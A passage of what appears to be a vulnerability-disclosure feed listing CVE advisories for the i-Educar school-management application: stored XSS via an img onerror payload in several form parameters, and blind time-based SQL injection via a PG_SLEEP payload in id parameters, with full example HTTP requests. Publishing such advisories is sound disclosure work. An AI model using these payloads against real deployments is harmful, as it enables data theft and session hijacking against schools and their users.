tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9722/image.png" width="584" height="257" srcset="/p/cve-2025-9722/image_hu_c8cf46eb6b050b41.png 480w, /p/cve-2025-9722/image_hu_f1b1f0088f0fff87.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="227" data-flex-basis="545px" /></p> <p><img src="/p/cve-2025-9722/image-1.png" width="551" height="217" srcset="/p/cve-2025-9722/image-1_hu_8154a177a690938.png 480w, /p/cve-2025-9722/image-1_hu_7bd166c5469b1b4a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="609px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9723/ https://www.cvehunters.com/p/cve-2025-9723/ <h2 id="cve-2025-9723-cross-site-scripting-xss-stored-endpoint-educar_tipo_regime_cadphp-parameter-nm_tipo">CVE-2025-9723: Cross-Site Scripting (XSS) Stored endpoint <code>educar_tipo_regime_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9723</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_tipo_regime_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_regime_cad.php</code></p><h2 id="cve-2025-9723-cross-site-scripting-xss-stored-endpoint-educar_tipo_regime_cadphp-parameter-nm_tipo">CVE-2025-9723: Cross-Site Scripting (XSS) Stored endpoint <code>educar_tipo_regime_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9723" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9723</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_tipo_regime_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_regime_cad.php</code></p> <p>Parameter: <code>nm_tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9723/image.png" width="579" height="228" srcset="/p/cve-2025-9723/image_hu_30ee5bc94558a46c.png 480w, /p/cve-2025-9723/image_hu_d033cd6d8b8c0c81.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="609px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9724/ https://www.cvehunters.com/p/cve-2025-9724/ <h2 id="cve-2025-9724-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_nivel_ensino_cadphp">CVE-2025-9724: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_nivel_ensino_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9724" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9724</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_nivel_ensino_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_nivel</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_nivel_ensino_cad.php</code></p><h2 id="cve-2025-9724-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_nivel_ensino_cadphp">CVE-2025-9724: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_nivel_ensino_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9724" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9724</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_nivel_ensino_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_nivel</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_nivel_ensino_cad.php</code></p> <p>Parameters: <code>nm_nivel</code> and <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_nivel</code> and <code>descricao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9724/image.png" width="572" height="212" srcset="/p/cve-2025-9724/image_hu_f1ad93c28c15da33.png 480w, /p/cve-2025-9724/image_hu_82e5db05c0ce4244.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="269" data-flex-basis="647px" /></p> <p><img src="/p/cve-2025-9724/image-1.png" width="572" height="223" srcset="/p/cve-2025-9724/image-1_hu_d0f78472b39dbbb3.png 480w, /p/cve-2025-9724/image-1_hu_1f1d3d37f56155fa.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="256" data-flex-basis="615px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9724.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9738/ https://www.cvehunters.com/p/cve-2025-9738/ <h2 id="cve-2025-9738-cross-site-scripting-xss-stored-endpoint-educar_tipo_ensino_cadphp-parameter-nm_tipo">CVE-2025-9738: Cross-Site Scripting (XSS) Stored endpoint <code>educar_tipo_ensino_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9738" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9738</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_tipo_ensino_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_ensino_cad.php</code></p><h2 id="cve-2025-9738-cross-site-scripting-xss-stored-endpoint-educar_tipo_ensino_cadphp-parameter-nm_tipo">CVE-2025-9738: Cross-Site Scripting (XSS) Stored endpoint <code>educar_tipo_ensino_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9738" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9738</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_tipo_ensino_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_tipo_ensino_cad.php</code></p> <p>Parameter: <code>nm_tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9738/image.png" width="582" height="226" srcset="/p/cve-2025-9738/image_hu_8e88176a8609165e.png 480w, /p/cve-2025-9738/image_hu_2cdba1b0a67e9e2a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="257" data-flex-basis="618px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 31 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9684/ https://www.cvehunters.com/p/cve-2025-9684/ <h2 id="cve-2025-9684-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaedit-endpoint">CVE-2025-9684: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/FormulaMedia/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9684" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9684</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/FormulaMedia/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9684-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleformulamediaedit-endpoint">CVE-2025-9684: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/FormulaMedia/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9684" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9684</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/FormulaMedia/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/FormulaMedia/edit</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/FormulaMedia/edit?id=1%27+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+%27WqeR%27=%27WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9684/image.png" width="1177" height="1049" srcset="/p/cve-2025-9684/image_hu_4da7a86622a45df0.png 480w, /p/cve-2025-9684/image_hu_1f080892d45bc258.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="112" data-flex-basis="269px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9685/ https://www.cvehunters.com/p/cve-2025-9685/ <h2 id="cve-2025-9685-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoview-endpoint">CVE-2025-9685: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/AreaConhecimento/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9685" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9685</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/AreaConhecimento/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9685-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoview-endpoint">CVE-2025-9685: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/AreaConhecimento/view</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9685" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9685</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/AreaConhecimento/view</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/AreaConhecimento/view</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/AreaConhecimento/view?id=3'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/AreaConhecimento/index </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-9685/image.png" width="1121" height="1008" srcset="/p/cve-2025-9685/image_hu_9ce46d5757c7b26c.png 480w, /p/cve-2025-9685/image_hu_eb5dd3ebbb1178d3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="266px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9685.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 30 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9686/ https://www.cvehunters.com/p/cve-2025-9686/ <h2 id="cve-2025-9686-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoedit-endpoint">CVE-2025-9686: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/AreaConhecimento/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9686" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9686</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/AreaConhecimento/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-9686-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduleareaconhecimentoedit-endpoint">CVE-2025-9686: SQL Injection (Blind Time-Based) 